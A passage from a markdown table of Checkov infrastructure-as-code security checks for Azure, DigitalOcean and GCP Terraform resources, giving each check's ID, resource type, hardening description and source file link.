CKV2_AZURE_19 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces have no IP firewall rules attached | Terraform | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml) | -| 1541 | CKV2_AZURE_20 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Table service for read 
requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 1542 | CKV2_AZURE_20 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 1543 | CKV2_AZURE_20 | resource | azurerm_storage_table | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 1544 | CKV2_AZURE_21 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 1545 | CKV2_AZURE_21 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 1546 | CKV2_AZURE_21 | resource | azurerm_storage_container | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 1547 | CKV2_AZURE_22 | resource | azurerm_cognitive_account | Ensure that Cognitive Services enables 
customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | -| 1548 | CKV2_AZURE_22 | resource | azurerm_cognitive_account_customer_managed_key | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | -| 1549 | CKV2_AZURE_23 | resource | azurerm_spring_cloud_service | Ensure Azure spring cloud is configured with Virtual network (Vnet) | Terraform | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml) | -| 1550 | CKV2_AZURE_24 | resource | azurerm_automation_account | Ensure Azure automation account does NOT have overly permissive network access | Terraform | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml) | -| 1551 | CKV2_AZURE_25 | resource | azurerm_mssql_database | Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled | Terraform | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml) | -| 1552 | CKV2_AZURE_26 | resource | azurerm_postgresql_flexible_server_firewall_rule | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access | Terraform | 
[AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml) | -| 1553 | CKV2_AZURE_27 | resource | azurerm_mssql_server | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Terraform | [AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml) | -| 1554 | CKV2_AZURE_28 | resource | azurerm_container_group | Ensure Container Instance is configured with managed identity | Terraform | [AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml) | -| 1555 | CKV2_AZURE_29 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Azure CNI networking enabled | Terraform | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml) | -| 1556 | CKV2_AZURE_30 | resource | azurerm_container_registry_webhook | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook | Terraform | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml) | -| 1557 | CKV2_AZURE_31 | resource | azurerm_subnet | Ensure VNET subnet is configured with a Network Security Group (NSG) | Terraform | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml) | -| 1558 | CKV2_AZURE_32 | resource | azurerm_key_vault | Ensure private endpoint is configured to key vault | Terraform | 
[AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml) | -| 1559 | CKV2_AZURE_33 | resource | azurerm_storage_account | Ensure storage account is configured with private endpoint | Terraform | [AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml) | -| 1560 | CKV2_AZURE_34 | resource | azurerm_sql_firewall_rule | Ensure Azure SQL server firewall is not overly permissive | Terraform | [AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml) | -| 1561 | CKV2_AZURE_35 | resource | azurerm_recovery_services_vault | Ensure Azure recovery services vault is configured with managed identity | Terraform | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml) | -| 1562 | CKV2_AZURE_36 | resource | azurerm_automation_account | Ensure Azure automation account is configured with managed identity | Terraform | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml) | -| 1563 | CKV2_AZURE_37 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is using latest TLS (1.2) | Terraform | [AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml) | -| 1564 | CKV2_AZURE_38 | resource | azurerm_storage_account | Ensure soft-delete is enabled on Azure storage account | Terraform | 
[AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml) |
-| 1565 | CKV2_AZURE_39 | resource | azurerm_linux_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) |
-| 1566 | CKV2_AZURE_39 | resource | azurerm_network_interface | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) |
-| 1567 | CKV2_AZURE_39 | resource | azurerm_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) |
-| 1568 | CKV2_AZURE_39 | resource | azurerm_windows_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) |
-| 1569 | CKV2_AZURE_40 | resource | azurerm_storage_account | Ensure storage account is not configured with Shared Key authorization | Terraform | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml) |
-| 1570 | CKV2_AZURE_41 | resource | azurerm_storage_account | Ensure storage account is configured with SAS expiration policy | Terraform | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml) |
-| 1571 | CKV2_AZURE_42 | resource | azurerm_postgresql_server | Ensure Azure PostgreSQL server is configured with private endpoint | Terraform | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml) |
-| 1572 | CKV2_AZURE_43 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is configured with private endpoint | Terraform | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml) |
-| 1573 | CKV2_AZURE_44 | resource | azurerm_mysql_server | Ensure Azure MySQL server is configured with private endpoint | Terraform | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml) |
-| 1574 | CKV2_AZURE_45 | resource | azurerm_mssql_server | Ensure Microsoft SQL server is configured with private endpoint | Terraform | [AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml) |
-| 1575 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_security_alert_policy | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) |
-| 1576 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_vulnerability_assessment | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) |
-| 1577 | CKV2_AZURE_47 | resource | azurerm_storage_account | Ensure storage account is configured without blob anonymous access | Terraform | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml) |
-| 1578 | CKV_BCW_1 | provider | bridgecrew | Ensure no hard coded API token exist in the provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py) |
-| 1579 | CKV_DIO_1 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket has versioning enabled | Terraform | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py) |
-| 1580 | CKV_DIO_2 | resource | digitalocean_droplet | Ensure the droplet specifies an SSH key | Terraform | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py) |
-| 1581 | CKV_DIO_3 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket is private | Terraform | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py) |
-| 1582 | CKV_DIO_4 | resource | digitalocean_firewall | Ensure the firewall ingress is not wide open | Terraform | [FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py) |
-| 1583 | CKV_GCP_1 | resource | google_container_cluster | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py) |
-| 1584 | CKV_GCP_2 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted ssh access | Terraform | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py) |
-| 1585 | CKV_GCP_3 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted rdp access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py) |
-| 1586 | CKV_GCP_4 | resource | google_compute_ssl_policy | Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites | Terraform | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py) |
-| 1587 | CKV_GCP_6 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance requires all incoming connections to use SSL | Terraform | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py) |
-| 1588 | CKV_GCP_7 | resource | google_container_cluster | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters | Terraform | [GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py) |
-| 1589 | CKV_GCP_8 | resource | google_container_cluster | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py) |
-| 1590 | CKV_GCP_9 | resource | google_container_node_pool | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py) |
-| 1591 | CKV_GCP_10 | resource | google_container_node_pool | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py) |
-| 1592 | CKV_GCP_11 | resource | google_sql_database_instance | Ensure that Cloud SQL database Instances are not open to the world | Terraform | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py) |
-| 1593 | CKV_GCP_12 | resource | google_container_cluster | Ensure Network Policy is enabled on Kubernetes Engine Clusters | Terraform | [GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py) |
-| 1594 | CKV_GCP_13 | resource | google_container_cluster | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled | Terraform | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py) |
-| 1595 | CKV_GCP_14 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance have backup configuration enabled | Terraform | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py) |
-| 1596 | CKV_GCP_15 | resource | google_bigquery_dataset | Ensure that BigQuery datasets are not anonymously or publicly accessible | Terraform | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py) |
-| 1597 | CKV_GCP_16 | resource | google_dns_managed_zone | Ensure that DNSSEC is enabled for Cloud DNS | Terraform | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py) |
-| 1598 | CKV_GCP_17 | resource | google_dns_managed_zone | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC | Terraform | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py) |
-| 1599 | CKV_GCP_18 | resource | google_container_cluster | Ensure GKE Control Plane is not public | Terraform | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py) |
-| 1600 | CKV_GCP_19 | resource | google_container_cluster | Ensure GKE basic auth is disabled | Terraform | [GKEBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBasicAuth.py) |
-| 1601 | CKV_GCP_20 | resource | google_container_cluster | Ensure master authorized networks is set to enabled in GKE clusters | Terraform | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py) |
-| 1602 | CKV_GCP_21 | resource | google_container_cluster | Ensure Kubernetes Clusters are configured with Labels | Terraform | [GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py) |
-| 1603 | CKV_GCP_22 | resource | google_container_node_pool | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image | Terraform | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py) |
-| 1604 | CKV_GCP_23 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Alias IP ranges enabled | Terraform | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py) |
-| 1605 | CKV_GCP_24 | resource | google_container_cluster | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters | Terraform | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py) |
-| 1606 | CKV_GCP_25 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Private cluster enabled | Terraform | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py) |
-| 1607 | CKV_GCP_26 | resource | google_compute_subnetwork | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network | Terraform | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py) |
-| 1608 | CKV_GCP_27 | resource | google_project | Ensure that the default network does not exist in a project | Terraform | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py) |
-| 1609 | CKV_GCP_28 | resource | google_storage_bucket_iam_binding | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) |
-| 1610 | CKV_GCP_28 | resource | google_storage_bucket_iam_member | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) |
-| 1611 | CKV_GCP_29 | resource | google_storage_bucket | Ensure that Cloud Storage buckets have uniform bucket-level access enabled | Terraform | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py) |
-| 1612 | CKV_GCP_30 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) |
-| 1613 | CKV_GCP_30 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) |
-| 1614 | CKV_GCP_30 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) |
-| 1615 | CKV_GCP_31 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) |
-| 1616 | CKV_GCP_31 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) |
-| 1617 | CKV_GCP_31 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) |
-| 1618 | CKV_GCP_32 | resource | google_compute_instance | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) |
-| 1619 | CKV_GCP_32 | resource | google_compute_instance_from_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) |
-| 1620 | CKV_GCP_32 | resource | google_compute_instance_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) |
-| 1621 | CKV_GCP_33 | resource | google_compute_project_metadata | Ensure oslogin is enabled for a Project | Terraform | [GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py) |
-| 1622 | CKV_GCP_34 | resource | google_compute_instance | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) |
-| 1623 | CKV_GCP_34 | resource | google_compute_instance_from_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) |
-| 1624 | CKV_GCP_34 | resource | google_compute_instance_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) |
-| 1625 | CKV_GCP_35 | resource | google_compute_instance | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) |
-| 1626 | CKV_GCP_35 | resource | google_compute_instance_from_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) |
-| 1627 | CKV_GCP_35 | resource | google_compute_instance_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) |
-| 1628 | CKV_GCP_36 | resource | google_compute_instance | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) |
-| 1629 | CKV_GCP_36 | resource | google_compute_instance_from_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) |
-| 1630 | CKV_GCP_36 | resource | google_compute_instance_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) |
-| 1631 | CKV_GCP_37 | resource | google_compute_disk | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py) |
-| 1632 | CKV_GCP_38 | resource | google_compute_instance | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py) |
-| 1633 | CKV_GCP_39 | resource | google_compute_instance | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) |
-| 1634 | CKV_GCP_39 | resource | google_compute_instance_from_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) |
-| 1635 | CKV_GCP_39 | resource | google_compute_instance_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) |
-| 1636 | CKV_GCP_40 | resource | google_compute_instance | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) |
-| 1637 | CKV_GCP_40 | resource | google_compute_instance_from_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) |
-| 1638 | CKV_GCP_40 | resource | google_compute_instance_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) |
-| 1639 | CKV_GCP_41 | resource | google_project_iam_binding | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) |
